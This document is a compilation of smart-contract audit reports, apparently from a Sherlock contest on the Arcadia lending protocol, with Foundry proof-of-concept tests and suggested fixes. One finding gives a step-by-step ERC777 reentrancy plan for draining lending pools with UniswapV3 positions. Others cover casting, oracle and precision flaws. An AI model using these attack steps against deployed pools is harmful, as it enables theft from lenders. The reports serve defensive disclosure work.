-   function withdrawFromLendingPool(uint256 assets, address receiver)
+   function withdrawFromLendingPool(uint256 assets, address receiver, address account)
        external
        whenWithdrawNotPaused
        processInterests
    {
    	address withdrawer = msg.sender;
+	if (account != address(0)){
+		if(IFactory(ACCOUNT_FACTORY).ownerOfAccount(account) != msg.sender || maxWithdraw(account) > 0) revert;
+		withdrawer = account;
+	}
    

-       if (realisedLiquidityOf[msg.sender] < assets) revert LendingPoolErrors.AmountExceedsBalance();
+       if (realisedLiquidityOf[withdrawer] < assets) revert LendingPoolErrors.AmountExceedsBalance();
        unchecked {
-           realisedLiquidityOf[msg.sender] -= assets;
+           realisedLiquidityOf[withdrawer] -= assets;
            totalRealisedLiquidity = SafeCastLib.safeCastTo128(totalRealisedLiquidity - assets);
        }

        asset.safeTransfer(receiver, assets);
    }

Step 3: https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L983C1-L1031C6

    function settleLiquidationUnhappyFlow(
        address account,
        uint256 startDebt,
        uint256 minimumMargin_,
        address terminator
    ) external whenLiquidationNotPaused onlyLiquidator processInterests {
        (uint256 initiationReward, uint256 terminationReward, uint256 liquidationPenalty) =
            _calculateRewards(startDebt, minimumMargin_);


        uint256 debtShares = balanceOf[account];
        uint256 openDebt = convertToAssets(debtShares);
        uint256 badDebt;
        if (openDebt > terminationReward + liquidationPenalty) {
            unchecked {
                badDebt = openDebt - terminationReward - liquidationPenalty;
            }
            
+           uint256 deductFromBorrower = realisedLiquidityOf[account];
+           if (badDebt > deductFromBorrower){
+		totalRealisedLiquidity = uint128(totalRealisedLiquidity - badDebt);
+            	badDebt -= deductFromBorrower;
+		realisedLiquidityOf[account] = 0;
+		_processDefault(badDebt);
+           } else {
+		totalRealisedLiquidity = uint128(totalRealisedLiquidity - badDebt);
+	     	realisedLiquidityOf[account] -= badDebt;
+	     	badDebt = 0;
+	    }

-            totalRealisedLiquidity = uint128(totalRealisedLiquidity - badDebt);
-            _processDefault(badDebt);
        } else {
            ...
        }

        ...
    }

jesjupyer - Some NFTs can be both ERC721 and ERC1155, which is not considered by the design

jesjupyer

medium

Some NFTs can be both ERC721 and ERC1155, which is not considered by the design

Summary

Some NFTs support both ERC721 and ERC1155 (for example, see Asset Token), but this case is not considered in the contracts. If such a token is first added by an ERC721-typed Asset Module, it can no longer be supported by an ERC1155-typed Asset Module, and its transfers will be greatly limited since any amount larger than 1 causes a revert.

Vulnerability Detail

In the AbstractAM::constructor, the ASSET_TYPE is fixed and will be later returned in AbstractAM::processAsset

    constructor(address registry_, uint256 assetType_) Owned(msg.sender) {
        REGISTRY = registry_;
        ASSET_TYPE = assetType_;
    }
    ...
    function processAsset(address asset, uint256 assetId) external view virtual returns (bool, uint256) {
        return (isAllowed(asset, assetId), ASSET_TYPE);
    }

But for ERC721-typed Asset Modules (including mock files like FloorERC721AM), the function supportsInterface is never called on the assets when adding them.

However, some NFTs support both ERC721 and ERC1155 (for example, see Asset Token). So if such a token is first added by an ERC721-typed Asset Module, it can no longer be supported by an ERC1155-typed Asset Module due to the check in Registry::addAsset:

    function addAsset(address assetAddress) external onlyAssetModule {
        if (inRegistry[assetAddress]) revert RegistryErrors.AssetAlreadyInRegistry();

        inRegistry[assetAddress] = true;

        emit AssetAdded(assetAddress, assetToAssetModule[assetAddress] = msg.sender);
    }

Thus, the NFT's transfers will be greatly limited, since ERC721 only supports transfers of amount 1.

An example of this can be seen in AccountV1::_deposit and AccountV1::_withdraw:

            } else if (assetTypes[i] == 1) {
                if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();
                _withdrawERC721(to, assetAddresses[i], assetIds[i]);
            }

Impact

If a token that supports both ERC721 and ERC1155 is first added by an ERC721-typed Asset Module, it cannot be supported by an ERC1155-typed Asset Module anymore, and its transfers will be greatly limited since the amount cannot exceed 1.

Code Snippet

AbstractAM::constructor

    constructor(address registry_, uint256 assetType_) Owned(msg.sender) {
        REGISTRY = registry_;
        ASSET_TYPE = assetType_;
    }

AbstractAM::processAsset

    function processAsset(address asset, uint256 assetId) external view virtual returns (bool, uint256) {
        return (isAllowed(asset, assetId), ASSET_TYPE);
    }

Registry::addAsset

    function addAsset(address assetAddress) external onlyAssetModule {
        if (inRegistry[assetAddress]) revert RegistryErrors.AssetAlreadyInRegistry();

        inRegistry[assetAddress] = true;

        emit AssetAdded(assetAddress, assetToAssetModule[assetAddress] = msg.sender);
    }

AccountV1::_deposit and AccountV1::_withdraw

            } else if (assetTypes[i] == 1) {
                if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();
                _depositERC721(from, assetAddresses[i], assetIds[i]);
            } else if (assetTypes[i] == 2) {

Tool used

Manual Review, VSCode

Recommendation

Consider this situation and perform checks so that an NFT that supports both ERC721 and ERC1155 can only be added by an ERC1155-typed Asset Module. A sketch of such a check follows.
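A minimal sketch of such a check (not the project's code): an ERC721-typed Asset Module could query ERC165 before adding an asset and reject tokens that also advertise ERC1155 support. The interface definition, constant, and placement are assumptions:

    interface IERC165 {
        function supportsInterface(bytes4 interfaceId) external view returns (bool);
    }

    // ERC1155 interface id as defined by EIP-1155.
    bytes4 constant ERC1155_INTERFACE_ID = 0xd9b67a26;

    // Returns true if the asset claims ERC1155 support; tokens without ERC165 are treated as plain ERC721.
    function isAlsoERC1155(address asset) view returns (bool supported) {
        try IERC165(asset).supportsInterface(ERC1155_INTERFACE_ID) returns (bool result) {
            supported = result;
        } catch {
            supported = false;
        }
    }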

zzykxx - Lending pools that accept both ERC777 and UniswapV3 positions as collateral can be drained

zzykxx

high

Lending pools that accept both ERC777 and UniswapV3 positions as collateral can be drained

Summary

Depositing a fully compliant ERC777 token with a UniswapV3 position as collateral allows an attacker to steal funds and potentially drain the lending pools.

Vulnerability Detail

The AccountV1::deposit() function allows depositing multiple assets at once. It first executes Registry::batchProcessDeposit() and then proceeds to transfer the assets from the caller to the AccountV1 contract.

Registry::batchProcessDeposit() will execute a downstream call to UniswapV3AM::_addAsset() for UniswapV3 positions, which caches the amount of liquidity of the position:

function _addAsset(uint256 assetId) internal {
     ...
    (,, address token0, address token1,,,, uint128 liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);
     assetToLiquidity[assetId] = liquidity;
     ...
}

This can be exploited when combined with a deposit of a fully compliant ERC777 token that implements a tokensToSend hook that executes an external call to the address the token is being transferred from. This is possible in the following way:

  1. Call AccountV1::deposit() to deposit an ERC777 token and a UniswapV3 position: [ERC777, UniswapV3 position]
  2. When Registry::batchProcessDeposit() is executed, UniswapV3AM::_addAsset() will cache the current liquidity of the UniwapV3 position
  3. When AccountV1::_depositERC20() on the ERC777 token is executed the attacker gets a callback and takes control of the call flow
  4. The attacker decreases the liquidity of the UniswapV3 position, this is possible because the UniswapV3 position NFT has not been transferred yet
  5. AccountV1::_depositERC721() is executed and the UniswapV3 position is deposited
  6. Because the liquidity of the UniswapV3 position has been cached in step 2 the protocol will think the position is valued more than it is
  7. Borrow assets for a value higher than the collateral and create bad debt in the protocol

POC

With the test suite the project provided, creating a POC for this attack would take a lot of time. A complete POC would require modifying the custom UniswapV3 fork test-suite provided by the team in Discord to add ERC777 token support, and I think the idea is straightforward enough not to need a runnable POC. If one is necessary I will create an external repo with a functioning one.

Impact

An attacker can drain lending pools/creditors that accept both ERC777 and UniswapV3 positions as collateral.

Code Snippet

Tool used

Manual Review

Recommendation

The root cause of the described issue is that the liquidity of a UniswapV3 position is cached. Since removing the cache would open up other attacks, a good idea might be to check the liquidity of the UniswapV3 position again after the deposits have been executed and make sure it is equal to the initial one; a sketch follows.
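A minimal sketch of such a re-check (not the project's code), written as a hypothetical hook on UniswapV3AM that the Account would call once all asset transfers have completed; the function and error names are assumptions:

error LiquidityChangedDuringDeposit();

// Called by the Account after all transfers: the position's liquidity must still
// match the value cached by _addAsset() during batchProcessDeposit().
function verifyDeposit(uint256 assetId) external view {
    (,,,,,,, uint128 liquidityAfter,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);
    if (liquidityAfter != assetToLiquidity[assetId]) revert LiquidityChangedDuringDeposit();
}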

An additional thing to consider is that this kind of attack could be reused with future assets in other ways; it might be worth moving the batchProcessDeposit() call to after the deposits are executed, but I'm not entirely sure this does not introduce other attack vectors.

Duplicate of #154

joshuajee - Unsafe casting from `uint256` to `uint8` on the `tranches` array length, causing the emission of incorrect values

joshuajee

medium

Unsafe casting from uint256 to uint8 on the tranches array length, causing the emission of incorrect values

Summary

The tranches array length is cast from uint256 to uint8 and emitted as the trancheIndex. This leads to a wrong trancheIndex being emitted when the length of tranches exceeds 255.

Vulnerability Detail

The maximum value of uint8 is 255, while an array's length is a uint256, which is far larger. In the code, the length of the tranches array is cast to uint8. Because the tranches array can grow beyond 255 entries, the protocol will emit a wrong trancheIndex.
E.g.
When the tranches array length is 256, the emitted trancheIndex is 0.
When it is 257, the emitted trancheIndex is 1, and so on.

Impact

Emission of the wrong trancheIndex on-chain, thereby feeding indexers with wrong data.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L216C1-L229C6

    function addTranche(address tranche, uint16 interestWeight_) external onlyOwner processInterests {
        if (auctionsInProgress > 0) revert LendingPoolErrors.AuctionOngoing();
        if (isTranche[tranche]) revert LendingPoolErrors.TrancheAlreadyExists();

        totalInterestWeight += interestWeight_;
        interestWeightTranches.push(interestWeight_);
        interestWeight[tranche] = interestWeight_;

@>   uint8 trancheIndex = uint8(tranches.length);
        tranches.push(tranche);
        isTranche[tranche] = true;

        emit InterestWeightTrancheUpdated(tranche, trancheIndex, interestWeight_);
    }

This line is also affected

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L244

POC

This is a simple proof of concept: the true trancheIndex is 256, but 0 is emitted.
Add this code to
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/test/fuzz/LendingPool/Constructor.fuzz.t.sol
and run it with the command below

    forge test --mt "testFuzz_poc_tranche_Casting"
    function testFuzz_poc_tranche_Casting(uint256 vas) public {
        vm.startPrank(users.creatorAddress);
        for (uint i = 1; i <= 256; i++) {
            address _tranche = address(new TrancheExtension(address(pool), vas, "Tranche", "T"));
            vm.expectEmit();
            emit InterestWeightTrancheUpdated(_tranche, uint8(i), 0);
            pool.addTranche(_tranche, 0);
        }
        // The protocol will emit 0 as tranche index instead of 256 
        address _tranche = address(new TrancheExtension(address(pool), vas, "Tranche", "T"));
        vm.expectEmit();
        emit InterestWeightTrancheUpdated(_tranche, 0, 0);
        pool.addTranche(_tranche, 0);
        vm.stopPrank();
 
    }

Tool used

Manual Review and Foundry

Recommendation

Do not cast the tranches length to uint8, and make the following modification to the codebase

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L143

-    event InterestWeightTrancheUpdated(address indexed tranche, uint8 indexed trancheIndex, uint16 interestWeight);
+    event InterestWeightTrancheUpdated(address indexed tranche, uint indexed trancheIndex, uint16 interestWeight);

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L224C9-L224C53

-    uint8 trancheIndex = uint8(tranches.length);
+    uint trancheIndex = tranches.length;

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L244

-     emit InterestWeightTrancheUpdated(tranche, uint8(index), interestWeight_);
+    emit InterestWeightTrancheUpdated(tranche, index, interestWeight_);

Or cap the length of the tranches array so that it never exceeds 255, the maximum value of uint8.

Duplicate of #32

jesjupyer - The hidden criterion "Length can be maximally 3" may make `checkOracleSequence` return a wrong value

jesjupyer

medium

The hidden criterion "Length can be maximally 3" may make checkOracleSequence return a wrong value

Summary

There is no check on the length of the input arrays in BitPackingLib::pack. Later, when processing the oracleSequence, BitPackingLib::unpack has a hidden criterion that the length of the chain can be at most 3: even if the packed length exceeds 3, BitPackingLib.unpack() returns arrays of at most length 3. Since this criterion is neither documented nor explicitly checked, a sequence with a length greater than 3 (for example, 4-7) is truncated without reverting. Two scenarios can happen: 1. An unqualified sequence is accidentally considered valid. 2. A sequence that meets the other criteria is considered unqualified with the wrong reason being given.

Vulnerability Detail

In the BitPackingLib::pack function, even though the array length is required to be at most 3, this is not explicitly checked.

    function pack(bool[] memory boolValues, uint80[] memory uintValues) internal pure returns (bytes32 packedData) {
        assembly {
            // Get the length of the arrays.
            let length := mload(boolValues)

            // Store the total length in the two right most bits
            // Length is always smaller than or equal to 3.
            packedData := length
            ...
        }
        ...
    }

Later, when the packedData is used as oracleSequence in unpack, at most 3 elements can be returned since the mask 0x3 is hard-coded. So if the stored length is 5 (0b101), only the first element is parsed from the oracleSequence; if it is 6 (0b110), the first 2 elements; if it is 7 (0b111), the first 3 elements.

    function unpack(bytes32 packedData) internal pure returns (bool[] memory boolValues, uint256[] memory uintValues) {
        assembly {
            // Use bitmask to extract the array length from the rightmost 2 bits.
            // Length is always smaller than or equal to 3.
            let length := and(packedData, 0x3)
            ...
        }
        ...
    }

In Registry::checkOracleSequence the unpacked values are used directly to check the criteria (e.g. the oracle must be previously added to the Registry and must still be active, ...). If the user inputs a sequence with a length greater than 3 (for example, 5-7), the input is truncated without reverting.

    function checkOracleSequence(bytes32 oracleSequence) external view returns (bool) {
        (bool[] memory baseToQuoteAsset, uint256[] memory oracles) = oracleSequence.unpack();
        uint256 length = oracles.length;
        if (length == 0) revert RegistryErrors.Min1Oracle();
        // Length can be maximally 3, but no need to explicitly check it.
        // BitPackingLib.unpack() can maximally return arrays of length 3.
        ...
    }

There are two scenarios to consider:

  • An unqualified sequence would accidentally be considered valid

    • When the input consists of the oracle pairs (A, USD), (B, USD), (B, C), (C, D), (D, E), the total length is 5.
    • After unpack is called, only the (A, USD) pair is parsed.
    • Since the parsed path ends with USD, checkOracleSequence returns true, whereas it should be false.
  • A sequence that meets the other criteria will be considered unqualified with the wrong reason being given

    • When the input consists of the oracle pairs (A, B), (B, C), (C, D), (D, USD), the total length is 4.
    • After unpack is called, the parsed array length is 0, since 0x4 & 0x3 = 0.
    • The function reverts with RegistryErrors.Min1Oracle(), which is incorrect.

Impact

If the user inputs a sequence with a length greater than 3 (for example, 4-7), the input is truncated without reverting. Two scenarios can happen: 1. An unqualified sequence is accidentally considered valid. 2. A sequence that meets the other criteria is considered unqualified with the wrong reason being given. This is neither robust nor fault-tolerant.

Code Snippet

BitPackingLib::pack

            // Get the length of the arrays.
            let length := mload(boolValues)

            // Store the total length in the two right most bits
            // Length is always smaller than or equal to 3.
            packedData := length

BitPackingLib::unpack

            // Length is always smaller than or equal to 3.
            let length := and(packedData, 0x3)

Registry::checkOracleSequence

    function checkOracleSequence(bytes32 oracleSequence) external view returns (bool) {
        (bool[] memory baseToQuoteAsset, uint256[] memory oracles) = oracleSequence.unpack();
        uint256 length = oracles.length;
        if (length == 0) revert RegistryErrors.Min1Oracle();
        // Length can be maximally 3, but no need to explicitly check it.
        // BitPackingLib.unpack() can maximally return arrays of length 3.

Tool used

Manual Review, VSCode

Recommendation

A few things should be done:

  1. Limit the input array length in BitPackingLib::pack (see the sketch below).
  2. Check the length in BitPackingLib::unpack to guarantee that packedData has no bits left unvisited after the iteration.
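A minimal sketch of the first point (not the project's code); the wrapper library and error name are assumptions, and the existing assembly packing logic is elided:

    library BitPackingLibChecked {
        error MaxThreeValues();

        function pack(bool[] memory boolValues, uint80[] memory uintValues) internal pure returns (bytes32 packedData) {
            // Revert instead of silently truncating: unpack can only ever return up to 3 elements.
            if (boolValues.length > 3 || boolValues.length != uintValues.length) revert MaxThreeValues();

            // ...existing assembly packing logic from BitPackingLib.pack...
        }
    }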

0xrice.cooker - Borrowers risk having all of their collateral liquidated at a low price

0xrice.cooker

medium

Borrowers risk having all of their collateral liquidated at a low price

Summary

There is no mechanism protecting the borrower from having all of their collateral liquidated, even once the position would be healthy again.

Vulnerability Detail

It is common sense that most bidders will wait for the auctioned collateral price to drop below the market price before buying, since nobody gives money away for free. In a Dutch auction the collateral price goes from high to low until the debt position becomes healthy again, so the last bidder captures the most profit. On-chain, being the last bidder is even easier because of front-running. If the story ended here there would be nothing to discuss, but because the last bidder is allowed to over-buy the collateral, they can buy most of the borrower's collateral (possibly leaving some behind when it would not be profitable) at a low price.

Let's have a scenario here:
- Borrower A deposits $1000 worth of collateral into their margin account and borrows $400 worth of assets. Assume a liquidation factor of 60%, a collateral factor of 40%, and minimumMargin = 0 for simpler calculation.
- Over time the debt grows to $600, which makes the account liquidatable, so someone calls startLiquidation() on the account.
- After a while of auctioning, the account has only $200 worth of debt and $450 worth of collateral, which can be bought for $350.
- Note that borrower A only needs someone to buy $41 of it for the account to become healthy again.
- Scenario 1: someone buys exactly $41 more. Borrower A has 200 - 41 = $159 of debt and 450 - (41 * 450 / 350) = $397 of collateral, and the position is healthy again (397 * 0.4 ≈ 159). The difference between collateral and debt is 397 - 159 = $238.
- Scenario 2: because the terminator can overbid, the terminator buys all of the borrower's collateral for $350 and later sells it on the open market for $450, gaining $100 of profit.
- In that case the auction ends with the borrower holding only 350 - 200 = $150 worth of assets, with the debt fully repaid.

As you can see, there is a massive difference for the borrower between the two scenarios.

Impact

The borrower will very likely lose all of their collateral when the account is auctioned, because bidders have a strong incentive to buy all of it.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L500C1-L508C10

Tool used

Manual Review

Recommendation

Implement logic that prevents the bidder from overbidding the borrower by too much. It could look something like this:

    function auctionRepay(uint256 startDebt, uint256 minimumMargin_, uint256 amount, address account, address bidder)
        external
        whenLiquidationNotPaused
        onlyLiquidator
        processInterests
        returns (bool earlyTerminate)
    {
        // Need to transfer before burning debt or ERC777s could reenter.
        // Address(this) is trusted -> no risk on re-entrancy attack after transfer.
        asset.safeTransferFrom(bidder, address(this), amount);

        uint256 accountDebt = maxWithdraw(account);
        if (accountDebt == 0) revert LendingPoolErrors.IsNotAnAccountWithDebt();
        if (accountDebt <= amount) {
+   	    if(amount - accountDebt > OVERBID_MAXIMUM) revert;

            earlyTerminate = true;
            unchecked {
                _settleLiquidationHappyFlow(account, startDebt, minimumMargin_, bidder, (amount - accountDebt));
            }
            amount = accountDebt;
        }

        _withdraw(amount, address(this), account);

        emit Repay(account, bidder, amount);
    }

n1punp - Contract functionality may silently fail because the hardcoded Permit2 contract address is not available on some L2s

n1punp

medium

Contract functionality may silently fail because the hardcoded Permit2 contract address is not available on some L2s

Summary

Contract functionality may silently fail because the Permit2 contract is not available on some L2s.

Vulnerability Detail

As stated in the list of chains the contracts may be deployed on, it is possible that this code will be used on other L2s as well.

The AccountV1 contract hardcodes the Permit2 contract address to 0x000000000022D473030F116dDEE9F6B43aC78BA3. This is correct on some L2s, but not on others. On an L2 where Permit2 is not deployed at this address, _transferFromOwnerWithPermit will fail whenever it is invoked.

Impact

The contract deploys successfully, but the Permit2 functionality silently fails once users try to use it.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/accounts/AccountV1.sol#L56

Tool used

Manual Review

Recommendation

Either

  • Assign the Permit2 address in the constructor, or
  • Validate the existence of the contract at the hardcoded address in the constructor, so deployment does not pass silently. A sketch combining both options follows.
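A minimal sketch combining both options (not the project's code); the constructor shape and error name are assumptions, and PERMIT2 would have to become immutable instead of a constant:

    error NoPermit2Deployed();

    constructor(address factory, address permit2) {
        // Fail loudly at deployment time if no contract is deployed at the given Permit2 address.
        if (permit2.code.length == 0) revert NoPermit2Deployed();
        PERMIT2 = IPermit2(permit2);
        FACTORY = factory;
    }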

AgileJune - Chainlink aggregators return the incorrect price if it drops below minAnswer

AgileJune

medium

Chainlink aggregators return the incorrect price if it drops below minAnswer

Summary

Chainlink aggregators return the incorrect price if it drops below minAnswer

Vulnerability Detail

Chainlink aggregators are equipped with a built-in circuit breaker to manage situations where the price of an asset moves outside of a predetermined price range. In the event of a significant decrease in an asset's value, such as the case with the LUNA crash, the oracle will continue to return the minAnswer instead of the actual price of the asset. This mechanism, detailed in Chainlink's documentation, includes minAnswer and maxAnswer circuit breakers to mitigate potential issues when the asset's price falls below the minAnswer.

Impact

This issue could potentially allow users to exploit certain parts of the protocol, leading to significant issues and potential loss of funds, which is exactly what happened to Venus on BSC when LUNA imploded.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/oracle-modules/ChainlinkOM.sol#L113-L129

Tool used

Manual Review

Recommendation

Implement a validation check that reverts if the price received from the oracle is outside the predefined bounds, as in the sketch below.
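A minimal sketch of such a check (not the project's code); IAggregatorMinMax is a hypothetical interface for the underlying aggregator's circuit-breaker bounds, and the real ChainlinkOM would apply this inside its price-reading function:

    interface IAggregatorMinMax {
        function minAnswer() external view returns (int192);
        function maxAnswer() external view returns (int192);
    }

    function _checkAnswerWithinBounds(address aggregator, int256 answer) view {
        int256 minAnswer = int256(IAggregatorMinMax(aggregator).minAnswer());
        int256 maxAnswer = int256(IAggregatorMinMax(aggregator).maxAnswer());
        // Reject answers pinned to the circuit-breaker bounds (e.g. a LUNA-style crash).
        if (answer <= minAnswer || answer >= maxAnswer) revert("ChainlinkOM: answer out of bounds");
    }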

Duplicate of #34

n1punp - `Registry.setSequencerUptimeOracle` may be blocked if Chainlink changes the sequencer uptime oracle address, either by deploying a new implementation for the aggregator proxy or by simply re-deploying

n1punp

high

Registry.setSequencerUptimeOracle may be blocked if Chainlink changes the sequencer uptime oracle address, either by deploying a new implementation for the aggregator proxy or by simply re-deploying.

Summary

Registry.setSequencerUptimeOracle may be blocked if Chainlink changes the sequencer uptime oracle address, either by deploying a new implementation for the aggregator proxy or by simply re-deploying, breaking the uptime feed's correctness in the Registry.

Vulnerability Detail

The Registry's setSequencerUptimeOracle function tries to set a new sequencer uptime oracle. However, it requires the old oracle to revert. Now, consider the following scenario:

  • Chainlink deprecates the old uptime oracle (simply stop feeding), and migrates the feed to a new address.

This means the old oracle will simply keep its latestRoundData readable, since it is a view function, so the old oracle will not revert. As a result, setSequencerUptimeOracle will fail because it requires the old oracle to revert, blocking the address update. The Registry will then keep consuming the stale value, which may report incorrect results if something happens to the sequencer.

Impact

The Registry will not be able to change the uptime oracle address to the new one in such a scenario and will keep consuming non-updated data, which can be incorrect.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/Registry.sol#L186-L187

Tool used

Manual Review

Recommendation

  • Remove the requirement that the old sequencer uptime oracle reverts, and validate the new oracle instead; a sketch follows.
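A minimal sketch (not the project's code), assuming the setter roughly has this shape; the only change illustrated is validating the new oracle rather than requiring the old one to revert, and the error name is an assumption:

    error OracleReverting();

    function setSequencerUptimeOracle(address newSequencerUptimeOracle) external onlyOwner {
        // The old requirement (current oracle must be reverting) is removed.

        // The new oracle must answer latestRoundData() without reverting.
        (bool success,) = newSequencerUptimeOracle.staticcall(abi.encodeWithSignature("latestRoundData()"));
        if (!success) revert OracleReverting();

        sequencerUptimeOracle = newSequencerUptimeOracle;
    }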

zzykxx - Precision loss in the valuation of UniswapV3 positions might lead to premature liquidations

zzykxx

high

Precision loss in the valuation of UniswapV3 positions might lead to premature liquidations

Summary

A precision loss in the valuation of UniswapV3 positions might lead to premature liquidations causing unexpected loss to the user.

Vulnerability Detail

The function _getPrincipalAmounts() in UniswapV3AM calculates the underlying token amounts of a UniswapV3 liquidity position.
Internally it calls the function _getSqrtPriceX96() which is responsible for calculating the square root of the relative price of two tokens with 96 bits of precision:

function _getSqrtPriceX96(uint256 priceToken0, uint256 priceToken1) internal pure returns (uint160 sqrtPriceX96) {
    ...
    uint256 priceXd18 = priceToken0.mulDivDown(1e18, priceToken1); 
    uint256 sqrtPriceXd9 = FixedPointMathLib.sqrt(priceXd18);
    sqrtPriceX96 = uint160((sqrtPriceXd9 << FixedPoint96.RESOLUTION) / 1e9);
}

The vulnerability lies in the calculation of priceXd18 which is not done with enough precision. If priceToken1 is bigger than priceToken0 * 1e18, priceXd18 will be set to 0. The implication is that sqrtPriceX96 will also be 0, which will result in _getPrincipalAmounts() believing the whole liquidity position is constituted of token0 and the protocol evaluating the position incorrectly.

Let's suppose we have a UniswapV3 position of two tokens:

  • token0: SHIB, Value: ~$0.000009, Decimals: 18
  • token1: WBTC, Value: ~$40,000, Decimals: 8

The protocol evaluates all token prices for 1e18 units of token:

  • priceToken0: ((0.000009*1e18)*1e18)/1e18 = 9e12
  • priceToken1: ((40000*1e18) * 1e18)/1e8 = 4e32
  • priceXd18: (9e12 * 1e18)/4e32 = 0
  • sqrtPriceX96: 0

The 0 value will be then passed to getAmountsForLiquidity() as sqrtRatioX96 which will evaluate the position as if it only contains token0 (SHIB) tokens:

if (sqrtRatioX96 <= sqrtRatioAX96) {
    amount0 = getAmount0ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, liquidity);
}

Because of this, some UniswapV3 positions of tokens with a big discrepancy in price and decimals will be valued incorrectly. Due to price fluctuations, this can also start happening after the position has already been deposited.

POC

Here's a runnable POC that can be copy-pasted in GetUnderlyingAssetsAmounts.fuzz.t.sol. It shows that with a token0 with 18 decimals valued at $1 and a token1 with 2 decimals valued at $1,000, there is a precision loss that results in sqrtRatioX96 being 0:

function test_UniV3SqrtPrecisionLoss() public {
    UnderlyingAssetState memory asset0 = UnderlyingAssetState({decimals: 18, usdValue: 1}); //A token with 18 decimals valued 1$
    UnderlyingAssetState memory asset1 = UnderlyingAssetState({decimals: 2, usdValue: 1000}); //A token with 2 decimals valued 1000$

    uint96 tokenId = 197964524549228351;

    ERC20Mock token1 = new ERC20Mock("Token 1", "TOK1", uint8(asset1.decimals));
    ERC20Mock token0 = new ERC20Mock("Token 0", "TOK0", uint8(asset0.decimals));

    if (address(token0) > address(token1)) {
        (token0, token1) = (token1, token0);
        (asset0, asset1) = (asset1, asset0);
    }
    NonfungiblePositionManagerMock.Position memory position = NonfungiblePositionManagerMock.Position({
        nonce: 0,
        operator: address(0),
        poolId: 1,
        tickLower: -887272,
        tickUpper: 887272,
        liquidity: 1e18,
        feeGrowthInside0LastX128: 0,
        feeGrowthInside1LastX128: 0,
        tokensOwed0: 0,
        tokensOwed1: 0
    });

    addUnderlyingTokenToArcadia(address(token0), int256(asset0.usdValue));
    addUnderlyingTokenToArcadia(address(token1), int256(asset1.usdValue));
    IUniswapV3PoolExtension pool = createPool(token0, token1, 1e18, 300);
    nonfungiblePositionManagerMock.setPosition(address(pool), tokenId, position);

    uint256[] memory underlyingAssetsAmounts;
    AssetValueAndRiskFactors[] memory rateUnderlyingAssetsToUsd;
    {
        bytes32 assetKey = bytes32(abi.encodePacked(tokenId, address(nonfungiblePositionManagerMock)));
        (underlyingAssetsAmounts, rateUnderlyingAssetsToUsd) =
            uniV3AssetModule.getUnderlyingAssetsAmounts(address(creditorUsd), assetKey, 1, new bytes32[](0));
    }

    uint256 expectedRateUnderlyingAssetsToUsd0 = asset0.usdValue * 10 ** (36 - asset0.decimals);
    uint256 expectedRateUnderlyingAssetsToUsd1 = asset1.usdValue * 10 ** (36 - asset1.decimals);
    assertEq(rateUnderlyingAssetsToUsd[0].assetValue, expectedRateUnderlyingAssetsToUsd0);
    assertEq(rateUnderlyingAssetsToUsd[1].assetValue, expectedRateUnderlyingAssetsToUsd1);

    uint160 sqrtPriceX96 =
        uniV3AssetModule.getSqrtPriceX96(expectedRateUnderlyingAssetsToUsd0, expectedRateUnderlyingAssetsToUsd1);

    //❌ sqrtPriceX96 is equal to zero because of precision loss
    assertEq(sqrtPriceX96, 0); 

    (uint256 expectedUnderlyingAssetsAmount0, uint256 expectedUnderlyingAssetsAmount1) = LiquidityAmounts
        .getAmountsForLiquidity(
        sqrtPriceX96,
        TickMath.getSqrtRatioAtTick(position.tickLower),
        TickMath.getSqrtRatioAtTick(position.tickUpper),
        position.liquidity
    );

    //❌ The position is considered to be constituted only by `token0` 
    assertGt(expectedUnderlyingAssetsAmount0, 0); 
    assertEq(expectedUnderlyingAssetsAmount1, 0);
}

Impact

UniswapV3 positions are evaluated incorrectly, which might lead to premature liquidations (i.e. an unexpected loss of funds for the user).

Code Snippet

Tool used

Manual Review

Recommendation

This is a "division before multiplication" issue: the function first divides by priceToken1 and then multiplies by 2**96 (sqrtPriceXd9 << FixedPoint96.RESOLUTION). Multiply by 2^96 before diving by priceToken1 while taking care of possible overflows and adjusting the decimals after the square root by multiplying for 2^48.

0xVolodya - No more than 256 tranches to a single lending pool

0xVolodya

medium

No more than 256 tranches to a single lending pool

Summary

According to the docs (Invariants - LendingPool):

No more than 256 tranches to a single lending pool.

Vulnerability Detail

There is no restriction enforcing this in the code; the tranche count is silently cast to uint8, so the index wraps around once more than 256 tranches are added:

    function addTranche(address tranche, uint16 interestWeight_) external onlyOwner processInterests {
        if (auctionsInProgress > 0) revert LendingPoolErrors.AuctionOngoing();
        if (isTranche[tranche]) revert LendingPoolErrors.TrancheAlreadyExists();

        totalInterestWeight += interestWeight_;
        interestWeightTranches.push(interestWeight_);
        interestWeight[tranche] = interestWeight_;

        uint8 trancheIndex = uint8(tranches.length);
        tranches.push(tranche);
        isTranche[tranche] = true;

        emit InterestWeightTrancheUpdated(tranche, trancheIndex, interestWeight_);
    }

LendingPool.sol#L216

Impact

Code Snippet

POC - insert in AddTranche.fuzz.t.sol

    function testFuzz_Success_add_300_tranche(uint16 interestWeight) public {
        vm.startPrank(users.creatorAddress);
        for (uint16 i; i < 300; i++) {
            tranche = new TrancheExtension(address(pool), 111, "Tranche", "T");
            pool_.addTranche(address(tranche), i + 1);
        }

        assertTrue(pool_.numberOfTranches() < 256);
    }

Tool used

Manual Review

Recommendation

